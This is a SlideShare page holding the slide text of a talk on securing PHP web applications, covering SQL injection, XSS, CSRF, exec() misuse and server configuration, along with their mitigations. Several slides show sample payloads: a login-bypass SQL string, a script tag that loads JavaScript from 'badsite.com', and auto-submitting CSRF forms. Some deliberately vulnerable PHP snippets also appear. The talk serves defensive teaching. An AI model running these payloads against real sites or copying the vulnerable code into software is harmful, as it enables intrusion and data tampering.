DC
Uploaded byDamon Cortesi
832 views

PHPUG Presentation

This document summarizes common web application vulnerabilities like SQL injection and cross-site scripting (XSS) for PHP applications. It provides examples of each vulnerability and discusses mitigation strategies like input sanitization, encoding output, and using security frameworks. It also covers other risks like cross-site request forgery (CSRF) and the importance of secure server configurations.

Securing PHP Web Applications Web Applications Damon P. Cortesi, CISSP Directory @ Alchemy Security Stats Nut | Security Geek | Builder of Tools
$ whoami Security Consultant Part-time Web Dev (PHP, Django, Rails) Destroyer of Web Apps and Dual-Cores
<?=presoinfo();?> Typical web application vulnerabilities SQL Injection Cross-Site Scripting What to watch out for How to secure your PHP apps
SQL Injection $sql = “SELECT * FROM users WHERE username = ‘“ . $_POST[‘username’] . “‘ AND password = ‘“ . $_POST[‘password’] . “‘“; What if username is: “dpc’ or ‘a’=’a” ? ... username = ‘ dpc’ or ‘a’=’a ‘ ...
http://www.flickr.com/photos/tekalpha/94105897/
SQL Injection Username: dpc SELECT * FROM users WHERE username = ‘dpc‘ AND password = ‘apassword’; Username: dpc’ OR ‘A’=’A SELECT * FROM users WHERE username = ‘dpc ’ OR ‘A’=’A ‘ AND password = ‘apassword’;
Cross-Site Scripting User input re-displayed in browser and interpreted as HTML or ... JavaScript My name is Damon”><script>alert(‘hi’)</script> Why is this bad? Phishing Cookie stealing Arbitrary JavaScript execution...
XSS Example Ability to spoof an entire site by including JavaScript from elsewhere http://realsite.com/projects/search?q=test ”><script src=” http://badsite.com/evilphishingpage.js ”></script>... JavaScript can rewrite any DOM element...
Real-world Dangers We live in an interactive web
So what? I run a blog ... XSS me all day long ... I DON’T CARE! Fair enough. Importance of security is directly proportional to level of risk. Blog != Payment Gateway.
Coder for Hire? Are you willing to put your company reputation at stake? What type of apps are you building? Where _might_ your code be used? Themes? Plugins? include(‘wp_story’);
Common Mitigations “Increase your security by 80%, by fixing 20% of the problems.” Input Sanitization and Validation Data Encoding and Escaping
Sanitization/Encoding SQL: mysql_real_escape_string() HTML/XSS: htmlentities() “ <b>Damon</b> >> &quot;&lt;b&gt;Damon&lt;/b&gt; Beware encoding
Input Sanitization Fail exec(mysql_escape_string($_GET[‘var’])) Problem #1: mysql_escape_string is deprecated. Problem #2: MySQL escape does not make it safe for exec(). ?? preg_match(&quot;/.jpe?g$/i&quot;, $var) exec ( &quot;convert '&quot; . mysql_escape_string ( $path ) . &quot;' /tmp/'&quot; . mysql_escape_string ( basename ( $path )). &quot;'.png&quot; );
Better? Instead of dynamically constructing SQL queries...use a framework. CodeIgniter, CakePHP, Zend Or build a db.inc.php (but not a db.inc). Use an output library that automatically escapes.
Server-Side Checks Client-side code can be modified HTTP Proxies Toolbars Super-hack “save to disk” & modify Validate all user input with server-side code
Bug Hunting Data Inputs $_GET, $_POST, $_REQUEST $_SERVER[‘QUERY_STRING’] $_SERVER[‘PHP_SELF’] $_COOKIE Shell commands: exec()
Cross-Site Request Forgery Let’s Google for “javascript are you sure?” First result (circa 2006) is susceptible to CSRF (and probably SQL Injection). What is this CSRF?
GET CSRF delete.php?id=123 An action that modifies data called via HTTP GET (against HTTP specs). <img src=” http://x.com/delete.php?id=123” />
POST CSRF Only difference: JavaScript required to automate attack. <form name=”csrf” action=” http://x.com/delete.php ” method=”POST”> <input type=”hidden” name=”id” value=”123”> </form> <script>document.csrf.submit()</script>
CSRF in Action
Fixing CSRF Do not modify data using GET Use tokens on all form POSTs per-session per-form Up to you - convenience vs. security
Other Protections Secure Cookie Flag Restricts transmission of cookies set via HTTPS HTTPOnly Cookie Flag Can’t be accessed using <script> Use innerText, not innerHTML
3rd Party Plugins Need a plugin or specific function? Google. Download. Hackhack. It works! Is that code secure? (See prev. CSRF)
Server Config Not always some über-technical sploit... /phpMyAdmin unprotected? demo/demo password Email on confirmation page
Location: $references Chris Shiflett: http://shiflett.org / Essential PHP Security PHP Manual: http://www.php.net/manual/en/security.php Disable register_globals Disabled by default in PHP > 4.2.0 http://www.owasp.org/index.php/PHP_Top_5 http://startupsecurity.info
Thanks [email_address] http://xkcd.com/327/

More Related Content

PDF
Djangoアプリのデプロイに関するプラクティス / Deploy django application
byMasashi Shibata
 
PDF
Api
byrandyhoyt
 
PDF
Django の認証処理実装パターン / Django Authentication Patterns
byMasashi Shibata
 
PPTX
04. xss and encoding
byEoin Keary
 
PDF
JavaScript Security
byJason Harwig
 
PPTX
JSON SQL Injection and the Lessons Learned
byKazuho Oku
 
PDF
Introduction to Cross Site Scripting ( XSS )
byIrfad Imtiaz
 
PDF
Integrating WordPress With Web APIs
byrandyhoyt
 
Djangoアプリのデプロイに関するプラクティス / Deploy django application
byMasashi Shibata
 
Api
byrandyhoyt
 
Django の認証処理実装パターン / Django Authentication Patterns
byMasashi Shibata
 
04. xss and encoding
byEoin Keary
 
JavaScript Security
byJason Harwig
 
JSON SQL Injection and the Lessons Learned
byKazuho Oku
 
Introduction to Cross Site Scripting ( XSS )
byIrfad Imtiaz
 
Integrating WordPress With Web APIs
byrandyhoyt
 

What's hot

PDF
When Ajax Attacks! Web application security fundamentals
bySimon Willison
 
PDF
JSConf Asia: Node.js Authentication and Data Security
byTim Messerschmidt
 
PPTX
Authentication in Node.js
byJason Pearson
 
PPTX
Java script, security and you - Tri-Cities Javascript Developers Group
byAdam Caudill
 
PPTX
Integrating External APIs with WordPress
byMarty Thornley
 
PPTX
Case Study of Django: Web Frameworks that are Secure by Default
byMohammed ALDOUB
 
PPT
Xss is more than a simple threat
byAvădănei Andrei
 
PDF
From 0 to Spring Security 4.0
byrobwinch
 
PPT
Fav
byhelloppt
 
PDF
Mozilla Web Apps - Super-VanJS
byRobert Nyman
 
PDF
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
byAntonio Sanso
 
PPT
PHP Security
byMindfire Solutions
 
PDF
Node.js Authentication & Data Security
byTim Messerschmidt
 
PPTX
Owasp Top 10 A3: Cross Site Scripting (XSS)
byMichael Hendrickx
 
PDF
Repaso rápido a los nuevos estándares web
byPablo Garaizar
 
ODP
Top 10 Web Security Vulnerabilities
byCarol McDonald
 
PDF
Securing WordPress
byShawn Hooper
 
PDF
Hacking the Web
byMike Crabb
 
PDF
Secure Coding with WordPress - WordCamp SF 2008
byMark Jaquith
 
PPT
Website Security
byMODxpo
 
When Ajax Attacks! Web application security fundamentals
bySimon Willison
 
JSConf Asia: Node.js Authentication and Data Security
byTim Messerschmidt
 
Authentication in Node.js
byJason Pearson
 
Java script, security and you - Tri-Cities Javascript Developers Group
byAdam Caudill
 
Integrating External APIs with WordPress
byMarty Thornley
 
Case Study of Django: Web Frameworks that are Secure by Default
byMohammed ALDOUB
 
Xss is more than a simple threat
byAvădănei Andrei
 
From 0 to Spring Security 4.0
byrobwinch
 
Fav
byhelloppt
 
Mozilla Web Apps - Super-VanJS
byRobert Nyman
 
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
byAntonio Sanso
 
PHP Security
byMindfire Solutions
 
Node.js Authentication & Data Security
byTim Messerschmidt
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
byMichael Hendrickx
 
Repaso rápido a los nuevos estándares web
byPablo Garaizar
 
Top 10 Web Security Vulnerabilities
byCarol McDonald
 
Securing WordPress
byShawn Hooper
 
Hacking the Web
byMike Crabb
 
Secure Coding with WordPress - WordCamp SF 2008
byMark Jaquith
 
Website Security
byMODxpo
 

Viewers also liked

PPS
PRESENTACION VALLE DE TENA
byHotel Privilegio
 
PPT
PARABÉNS TFUFP!!!
bymjoaocastro
 
PPTX
seniorweb.ch - ein soziales Netzwerk
byalfons buehlmann
 
PDF
Sony emcs-scholarship-2012
byEiyka Ahmad
 
PDF
Leistritz Key Seating Machines
byTREVOR MOSS
 
DOCX
Jens_CV_and_Reference_Letter_June 2016
byJens Rune Brandal
 
PDF
ACCIONA Informa N. 59 - Noviembre 2014
byacciona
 
PDF
IV Foro TIC y Sostenibilidad: Futuro de la gestion RAEE de Colombia
bygaiasas
 
PDF
Sistemas de-comunicación-por-fibra
byDarthuz Kilates
 
PPTX
Global Dementia Legacy Event: Canada & France: Dr Etienne Hirsch & Dr Yves Jo...
byDepartment of Health
 
DOCX
Sanghaya inc
byBirei Gonzales
 
PPT
Deportes Extremos
byORLANDGOLD
 
PDF
Ecc report-cross-border-e-commerce en
byAna Smilović
 
PDF
newsasset Agency Edition
byAthens Technology Center
 
PDF
Edition 20 - Sharing in Petrobras - number 1/2006
byPetrobras
 
PDF
COETUR 2014: Casos de éxito en la gestión de un alojamiento rural con Riojania
byEscapadaRural
 
PDF
IPKeysPP - WEEC Presentation 9.29.15
byLaurie Wiegand-Jackson
 
PDF
Employee Benefits Guide 2017
byAlicia Holmes
 
PDF
Mapa parv relaciones_logico_matematicas_y_cuantificacion
byKarin Arancibia Estay
 
PDF
Personal Finance for Engineers (LinkedIn 2014)
byAdam Nash
 
PRESENTACION VALLE DE TENA
byHotel Privilegio
 
PARABÉNS TFUFP!!!
bymjoaocastro
 
seniorweb.ch - ein soziales Netzwerk
byalfons buehlmann
 
Sony emcs-scholarship-2012
byEiyka Ahmad
 
Leistritz Key Seating Machines
byTREVOR MOSS
 
Jens_CV_and_Reference_Letter_June 2016
byJens Rune Brandal
 
ACCIONA Informa N. 59 - Noviembre 2014
byacciona
 
IV Foro TIC y Sostenibilidad: Futuro de la gestion RAEE de Colombia
bygaiasas
 
Sistemas de-comunicación-por-fibra
byDarthuz Kilates
 
Global Dementia Legacy Event: Canada & France: Dr Etienne Hirsch & Dr Yves Jo...
byDepartment of Health
 
Sanghaya inc
byBirei Gonzales
 
Deportes Extremos
byORLANDGOLD
 
Ecc report-cross-border-e-commerce en
byAna Smilović
 
newsasset Agency Edition
byAthens Technology Center
 
Edition 20 - Sharing in Petrobras - number 1/2006
byPetrobras
 
COETUR 2014: Casos de éxito en la gestión de un alojamiento rural con Riojania
byEscapadaRural
 
IPKeysPP - WEEC Presentation 9.29.15
byLaurie Wiegand-Jackson
 
Employee Benefits Guide 2017
byAlicia Holmes
 
Mapa parv relaciones_logico_matematicas_y_cuantificacion
byKarin Arancibia Estay
 
Personal Finance for Engineers (LinkedIn 2014)
byAdam Nash
 

Similar to PHPUG Presentation

PDF
PHP Secure Programming
byBalavignesh Kasinathan
 
ODP
2009 Barcamp Nashville Web Security 101
bybrian_dailey
 
PPT
Securing Java EE Web Apps
byFrank Kim
 
PDF
Ajax Security
byJoe Walker
 
PDF
Intro to Php Security
byDave Ross
 
PPTX
Avoiding Cross Site Scripting - Not as easy as you might think
byErlend Oftedal
 
PPT
Php & Web Security - PHPXperts 2009
bymirahman
 
PDF
Applications secure by default
bySlawomir Jasek
 
PDF
Applications secure by default
bySecuRing
 
PDF
Application Security around OWASP Top 10
bySastry Tumuluri
 
PPT
Building Secure Twitter Apps
byDamon Cortesi
 
PPT
Joomla security nuggets
byguestbd1cdca
 
PPT
General Principles of Web Security
byjemond
 
PDF
My app is secure... I think
byWim Godden
 
PDF
Security 202 - Are you sure your site is secure?
byConFoo
 
PDF
Web Security 101
byMichael Peters
 
KEY
DVWA BruCON Workshop
bytestuser1223
 
PPSX
Web Security
bySupankar Banik
 
PDF
Evolution Of Web Security
byChris Shiflett
 
PDF
The top 10 security issues in web applications
byDevnology
 
PHP Secure Programming
byBalavignesh Kasinathan
 
2009 Barcamp Nashville Web Security 101
bybrian_dailey
 
Securing Java EE Web Apps
byFrank Kim
 
Ajax Security
byJoe Walker
 
Intro to Php Security
byDave Ross
 
Avoiding Cross Site Scripting - Not as easy as you might think
byErlend Oftedal
 
Php & Web Security - PHPXperts 2009
bymirahman
 
Applications secure by default
bySlawomir Jasek
 
Applications secure by default
bySecuRing
 
Application Security around OWASP Top 10
bySastry Tumuluri
 
Building Secure Twitter Apps
byDamon Cortesi
 
Joomla security nuggets
byguestbd1cdca
 
General Principles of Web Security
byjemond
 
My app is secure... I think
byWim Godden
 
Security 202 - Are you sure your site is secure?
byConFoo
 
Web Security 101
byMichael Peters
 
DVWA BruCON Workshop
bytestuser1223
 
Web Security
bySupankar Banik
 
Evolution Of Web Security
byChris Shiflett
 
The top 10 security issues in web applications
byDevnology
 

Recently uploaded

PDF
A Guide to Microsoft Azure's Scalable and Secure Cloud Solutions
byTeleglobal International
 
PPTX
sap 2016-09-14_PP_MRPType_VB_Blogged.pptx
byAmira Jemi
 
PDF
Unleash the Power of Salesforce Winter ’26 Release.pdf
byyoyoloftis
 
PDF
Tilannekatsaus tekoälytoimintaan Suomessa.pdf
byMindtrek
 
PDF
A business case for open source: From lock-in to value.pdf
byMindtrek
 
PDF
Writing GPU-Ready AI Models in Pure Java with Babylon
byAna-Maria Mihalceanu
 
PDF
Phishing for Answers: A Tech Filler Quiz.pdf
byConquiztadors- the Quiz Society of Sri Venkateswara College
 
PPTX
CLOUD STUDY JAM 2025 GOOGLE DEVELOPER GROUPS ON CAMPUS NSEC
byasutoshkumar560
 
PDF
Session 2 - Specialized AI Associate Series: Orchestrator Deep-Dive and UiPa...
byDianaGray10
 
PDF
Session 1 - Agentic Automation Building the Enterprise Agent of Tomorrow
byDianaGray10
 
PDF
Redefining HR Content Creation: Job Description Automation with UiPath's Agen...
byDianaGray10
 
PDF
OWASP Transparency Exchange API: How We (Will) Share xBOMs
byPavel Shukhman
 
PDF
Starting a Customer Education Program: Taking Your Training to Them
byRustici Software
 
PDF
Comprehensive Analysis of OpenAI's Strategic Transformation at DevDay 2025.pdf
byAlex Doan
 
PDF
Certified Kubernetes Security Specialist (CKS): Unit 5
byVICTOR MAESTRE RAMIREZ
 
PDF
Ultimate B2B Travel API Integration for Skyrocket Bookings
byanishadivaha
 
PDF
Web Mapping 101: Creating Dynamic Web Maps with Geospatial Data
bySafe Software
 
PDF
From Infrastructure to Insight: Technical Pathways to Value in Europe’s Compu...
byMindtrek
 
PDF
Mapping Your Ecosystem: Uniting Content and Data across Systems
byRustici Software
 
PPTX
DOC-20250918-WA0002.pptx Understanding the World Around Us
byvivekpunde6
 
A Guide to Microsoft Azure's Scalable and Secure Cloud Solutions
byTeleglobal International
 
sap 2016-09-14_PP_MRPType_VB_Blogged.pptx
byAmira Jemi
 
Unleash the Power of Salesforce Winter ’26 Release.pdf
byyoyoloftis
 
Tilannekatsaus tekoälytoimintaan Suomessa.pdf
byMindtrek
 
A business case for open source: From lock-in to value.pdf
byMindtrek
 
Writing GPU-Ready AI Models in Pure Java with Babylon
byAna-Maria Mihalceanu
 
Phishing for Answers: A Tech Filler Quiz.pdf
byConquiztadors- the Quiz Society of Sri Venkateswara College
 
CLOUD STUDY JAM 2025 GOOGLE DEVELOPER GROUPS ON CAMPUS NSEC
byasutoshkumar560
 
Session 2 - Specialized AI Associate Series: Orchestrator Deep-Dive and UiPa...
byDianaGray10
 
Session 1 - Agentic Automation Building the Enterprise Agent of Tomorrow
byDianaGray10
 
Redefining HR Content Creation: Job Description Automation with UiPath's Agen...
byDianaGray10
 
OWASP Transparency Exchange API: How We (Will) Share xBOMs
byPavel Shukhman
 
Starting a Customer Education Program: Taking Your Training to Them
byRustici Software
 
Comprehensive Analysis of OpenAI's Strategic Transformation at DevDay 2025.pdf
byAlex Doan
 
Certified Kubernetes Security Specialist (CKS): Unit 5
byVICTOR MAESTRE RAMIREZ
 
Ultimate B2B Travel API Integration for Skyrocket Bookings
byanishadivaha
 
Web Mapping 101: Creating Dynamic Web Maps with Geospatial Data
bySafe Software
 
From Infrastructure to Insight: Technical Pathways to Value in Europe’s Compu...
byMindtrek
 
Mapping Your Ecosystem: Uniting Content and Data across Systems
byRustici Software
 
DOC-20250918-WA0002.pptx Understanding the World Around Us
byvivekpunde6
 

PHPUG Presentation

  • 1.
    Securing PHP WebApplications Web Applications Damon P. Cortesi, CISSP Directory @ Alchemy Security Stats Nut | Security Geek | Builder of Tools
  • 2.
    $ whoami SecurityConsultant Part-time Web Dev (PHP, Django, Rails) Destroyer of Web Apps and Dual-Cores
  • 3.
    <?=presoinfo();?> Typical webapplication vulnerabilities SQL Injection Cross-Site Scripting What to watch out for How to secure your PHP apps
  • 4.
    SQL Injection $sql = “SELECT * FROM users WHERE username = ‘“ . $_POST[‘username’] . “‘ AND password = ‘“ . $_POST[‘password’] . “‘“; What if username is: “dpc’ or ‘a’=’a” ? ... username = ‘ dpc’ or ‘a’=’a ‘ ...
  • 5.
  • 6.
    SQL Injection Username: dpc SELECT * FROM users WHERE username = ‘dpc‘ AND password = ‘apassword’; Username: dpc’ OR ‘A’=’A SELECT * FROM users WHERE username = ‘dpc ’ OR ‘A’=’A ‘ AND password = ‘apassword’;
  • 7.
    Cross-Site Scripting Userinput re-displayed in browser and interpreted as HTML or ... JavaScript My name is Damon”><script>alert(‘hi’)</script> Why is this bad? Phishing Cookie stealing Arbitrary JavaScript execution...
  • 8.
    XSS Example Abilityto spoof an entire site by including JavaScript from elsewhere http://realsite.com/projects/search?q=test ”><script src=” http://badsite.com/evilphishingpage.js ”></script>... JavaScript can rewrite any DOM element...
  • 9.
    Real-world Dangers Welive in an interactive web
  • 10.
    So what? Irun a blog ... XSS me all day long ... I DON’T CARE! Fair enough. Importance of security is directly proportional to level of risk. Blog != Payment Gateway.
  • 11.
    Coder for Hire?Are you willing to put your company reputation at stake? What type of apps are you building? Where _might_ your code be used? Themes? Plugins? include(‘wp_story’);
  • 12.
    Common Mitigations “Increaseyour security by 80%, by fixing 20% of the problems.” Input Sanitization and Validation Data Encoding and Escaping
  • 13.
    Sanitization/Encoding SQL: mysql_real_escape_string()HTML/XSS: htmlentities() “ <b>Damon</b> >> &quot;&lt;b&gt;Damon&lt;/b&gt; Beware encoding
  • 14.
    Input Sanitization Failexec(mysql_escape_string($_GET[‘var’])) Problem #1: mysql_escape_string is deprecated. Problem #2: MySQL escape does not make it safe for exec(). ?? preg_match(&quot;/.jpe?g$/i&quot;, $var) exec ( &quot;convert '&quot; . mysql_escape_string ( $path ) . &quot;' /tmp/'&quot; . mysql_escape_string ( basename ( $path )). &quot;'.png&quot; );
  • 15.
    Better? Instead ofdynamically constructing SQL queries...use a framework. CodeIgniter, CakePHP, Zend Or build a db.inc.php (but not a db.inc). Use an output library that automatically escapes.
  • 16.
    Server-Side Checks Client-sidecode can be modified HTTP Proxies Toolbars Super-hack “save to disk” & modify Validate all user input with server-side code
  • 17.
    Bug Hunting DataInputs $_GET, $_POST, $_REQUEST $_SERVER[‘QUERY_STRING’] $_SERVER[‘PHP_SELF’] $_COOKIE Shell commands: exec()
  • 18.
    Cross-Site Request ForgeryLet’s Google for “javascript are you sure?” First result (circa 2006) is susceptible to CSRF (and probably SQL Injection). What is this CSRF?
  • 19.
    GET CSRF delete.php?id=123An action that modifies data called via HTTP GET (against HTTP specs). <img src=” http://x.com/delete.php?id=123” />
  • 20.
    POST CSRF Onlydifference: JavaScript required to automate attack. <form name=”csrf” action=” http://x.com/delete.php ” method=”POST”> <input type=”hidden” name=”id” value=”123”> </form> <script>document.csrf.submit()</script>
  • 21.
  • 22.
    Fixing CSRF Donot modify data using GET Use tokens on all form POSTs per-session per-form Up to you - convenience vs. security
  • 23.
    Other Protections SecureCookie Flag Restricts transmission of cookies set via HTTPS HTTPOnly Cookie Flag Can’t be accessed using <script> Use innerText, not innerHTML
  • 24.
    3rd Party PluginsNeed a plugin or specific function? Google. Download. Hackhack. It works! Is that code secure? (See prev. CSRF)
  • 25.
    Server Config Notalways some über-technical sploit... /phpMyAdmin unprotected? demo/demo password Email on confirmation page
  • 26.
    Location: $references ChrisShiflett: http://shiflett.org / Essential PHP Security PHP Manual: http://www.php.net/manual/en/security.php Disable register_globals Disabled by default in PHP > 4.2.0 http://www.owasp.org/index.php/PHP_Top_5 http://startupsecurity.info
  • 27.